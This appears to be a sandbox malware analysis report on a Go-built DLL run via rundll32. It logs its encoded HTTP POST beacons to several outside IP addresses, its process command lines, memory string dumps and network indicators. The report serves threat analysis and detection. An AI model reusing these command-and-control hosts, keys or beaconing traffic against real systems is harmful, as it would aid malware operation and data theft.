Jul 15, 2024 12:46:16.126537085 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ErdLxKUm Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.7	54570	91.142.74.28	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:17.874402046 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 3VCGBR54 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.7	54571	77.238.224.56	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:19.601041079 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ZaGahWnk Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.7	54572	77.238.229.63	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:21.236352921 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: dxF6k45R Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.7	54573	77.238.250.123	80	7236	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:46:22.883696079 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: rCgjheN8 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:46:23.486996889 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:46:23 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Statistics

Click to jump to process

Memory Usage

• loaddll32.exe
• conhost.exe
• cmd.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe

Click to jump to process

High Level Behavior Distribution

• File
• Network

Click to dive into process behavior distribution

Behavior

• loaddll32.exe
• conhost.exe
• cmd.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe

Click to jump to process

Target ID:	1
Start time:	06:42:17
Start date:	15/07/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\file.dll"
Imagebase:	0x690000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:42:17
Start date:	15/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:42:17
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	06:42:17
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc
Imagebase:	0x6c0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	06:42:17
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Imagebase:	0x6c0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	06:42:20
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export
Imagebase:	0x6c0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:42:27
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc
Imagebase:	0x6c0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	06:42:27
Start date:	15/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export
Imagebase:	0x6c0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Source: rundll32.exe, 00000005.00000002.3810630001.000000006BD6B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000006.00000002.3810709089.000000006BD6B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000007.00000002.1411443251.000000006BD6B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 0000000C.00000002.3811442355.000000006BD6B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 0000000D.00000002.1469950661.000000006BD6B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht

Source: Joe Sandbox View	IP Address: 91.142.74.28 91.142.74.28
Source: Joe Sandbox View	IP Address: 77.238.229.63 77.238.229.63
Source: Joe Sandbox View	IP Address: 195.2.70.38 195.2.70.38

Source: Joe Sandbox View	ASN Name: VTSL1-ASRU VTSL1-ASRU
Source: Joe Sandbox View	ASN Name: TELERU-ASRU TELERU-ASRU
Source: Joe Sandbox View	ASN Name: VDSINA-ASRU VDSINA-ASRU
Source: Joe Sandbox View	ASN Name: TELERU-ASRU TELERU-ASRU

Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
